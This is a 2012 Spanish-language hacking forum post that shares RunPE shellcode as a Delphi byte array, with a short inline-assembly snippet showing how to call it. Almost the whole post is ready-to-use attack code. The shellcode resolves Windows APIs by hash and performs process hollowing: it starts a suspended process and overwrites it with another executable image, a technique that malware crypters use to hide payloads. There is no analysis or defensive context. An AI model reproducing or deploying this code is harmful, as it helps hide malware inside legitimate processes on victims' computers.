[SNIPPET] Shellcode RunPE (Fully Dynamic)

Iniciado por Expermicid, Junio 24, 2012, 01:23:34 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 24, 2012, 01:23:34 AM Ultima modificación: Abril 21, 2013, 01:08:17 PM por Expermicid
RunPE creado por DeadlyVermilion

Código: delphi
var
  arrRunPE:  array[0..693] of Byte = (
    $55,$8B,$EC,$81,$C4,$A4,$FA,$FF,$FF,$89,$45,$FC,$E8,$1B,$02,$00,$00,$89,$85,$CC,
    $FD,$FF,$FF,$BB,$F2,$0F,$56,$C6,$8B,$95,$CC,$FD,$FF,$FF,$E8,$19,$02,$00,$00,$89,
    $45,$F8,$BB,$A9,$8B,$80,$2D,$8B,$95,$CC,$FD,$FF,$FF,$E8,$06,$02,$00,$00,$89,$45,
    $F4,$BB,$85,$3B,$AE,$DB,$8B,$95,$CC,$FD,$FF,$FF,$E8,$F3,$01,$00,$00,$89,$45,$F0,
    $BB,$93,$35,$DF,$85,$8B,$95,$CC,$FD,$FF,$FF,$E8,$E0,$01,$00,$00,$89,$45,$EC,$BB,
    $8D,$CB,$B6,$5D,$8B,$95,$CC,$FD,$FF,$FF,$E8,$CD,$01,$00,$00,$89,$45,$E8,$BB,$53,
    $13,$C1,$78,$8B,$95,$CC,$FD,$FF,$FF,$E8,$BA,$01,$00,$00,$89,$45,$E4,$BB,$8A,$DB,
    $DF,$A5,$8B,$95,$CC,$FD,$FF,$FF,$E8,$A7,$01,$00,$00,$89,$45,$E0,$BB,$2E,$05,$50,
    $C8,$8B,$95,$CC,$FD,$FF,$FF,$E8,$94,$01,$00,$00,$89,$45,$DC,$BB,$85,$A1,$16,$A2,
    $8B,$95,$CC,$FD,$FF,$FF,$E8,$81,$01,$00,$00,$E8,$06,$00,$00,$00,$6E,$74,$64,$6C,
    $6C,$00,$5F,$57,$FF,$D0,$89,$85,$D0,$FD,$FF,$FF,$BB,$8B,$E3,$CD,$41,$8B,$D0,$E8,
    $60,$01,$00,$00,$89,$45,$D8,$BB,$39,$23,$0D,$2C,$8B,$95,$D0,$FD,$FF,$FF,$E8,$4D,
    $01,$00,$00,$89,$45,$D4,$68,$00,$02,$00,$00,$8D,$85,$D4,$FD,$FF,$FF,$50,$6A,$00,
    $FF,$55,$F8,$6A,$44,$8D,$85,$88,$FD,$FF,$FF,$50,$FF,$55,$D4,$FF,$55,$F4,$8B,$C8,
    $8D,$85,$78,$FD,$FF,$FF,$50,$8D,$85,$88,$FD,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,
    $6A,$00,$6A,$00,$6A,$00,$51,$8D,$85,$D4,$FD,$FF,$FF,$50,$FF,$55,$F0,$68,$CC,$02,
    $00,$00,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$55,$D4,$C7,$85,$A4,$FA,$FF,$FF,$02,$00,
    $01,$00,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$B5,$7C,$FD,$FF,$FF,$FF,$55,$EC,$64,$A1,
    $30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$14,$8B,$40,$10,$50,$FF,$B5,$78,$FD,$FF,$FF,
    $FF,$55,$D8,$8B,$7D,$FC,$03,$7F,$3C,$6A,$40,$68,$00,$30,$00,$00,$FF,$77,$50,$FF,
    $77,$34,$FF,$B5,$78,$FD,$FF,$FF,$FF,$55,$E8,$89,$85,$74,$FD,$FF,$FF,$6A,$00,$FF,
    $77,$54,$FF,$75,$FC,$FF,$B5,$74,$FD,$FF,$FF,$FF,$B5,$78,$FD,$FF,$FF,$FF,$55,$E4,
    $8D,$47,$18,$89,$85,$70,$FD,$FF,$FF,$0F,$B7,$47,$14,$01,$85,$70,$FD,$FF,$FF,$33,
    $C0,$33,$F6,$33,$C9,$EB,$29,$6B,$C6,$28,$03,$85,$70,$FD,$FF,$FF,$8B,$9D,$74,$FD,
    $FF,$FF,$03,$58,$0C,$8B,$55,$FC,$03,$50,$14,$6A,$00,$FF,$70,$10,$52,$53,$FF,$B5,
    $78,$FD,$FF,$FF,$FF,$55,$E4,$46,$66,$3B,$77,$06,$72,$D1,$8B,$85,$74,$FD,$FF,$FF,
    $03,$47,$28,$89,$85,$54,$FB,$FF,$FF,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$B5,$7C,$FD,
    $FF,$FF,$FF,$55,$E0,$FF,$B5,$7C,$FD,$FF,$FF,$FF,$55,$DC,$C9,$C3,$64,$A1,$30,$00,
    $00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$40,$18,$C3,$55,$8B,$EC,$83,
    $C4,$F4,$52,$89,$55,$FC,$8B,$4A,$3C,$03,$CA,$89,$4D,$F4,$8B,$49,$78,$03,$CA,$89,
    $4D,$F8,$8B,$51,$18,$8B,$49,$20,$03,$4D,$FC,$33,$FF,$8B,$31,$03,$75,$FC,$33,$C0,
    $51,$AC,$8B,$C8,$03,$F8,$D3,$C7,$85,$C0,$75,$F5,$59,$3B,$FB,$74,$10,$83,$C1,$04,
    $4A,$75,$E0,$BA,$C2,$58,$62,$1B,$5A,$33,$C0,$C9,$C3,$8B,$45,$FC,$8B,$4D,$F8,$8B,
    $59,$18,$8B,$49,$24,$03,$C8,$2B,$DA,$D1,$E3,$03,$CB,$0F,$B7,$19,$8B,$4D,$F8,$8B,
    $49,$1C,$03,$C8,$C1,$E3,$02,$03,$CB,$03,$01,$5A,$C9,$C3);


Modo de uso:

Código: delphi
asm
  MOV EAX, dwArrayToRun
  LEA EBX, arrRunPE[0]
  CALL EBX
end;


Saludos

Fuente: ic0de
Imprimir
Ir Arriba Páginas1
Acciones del Usuario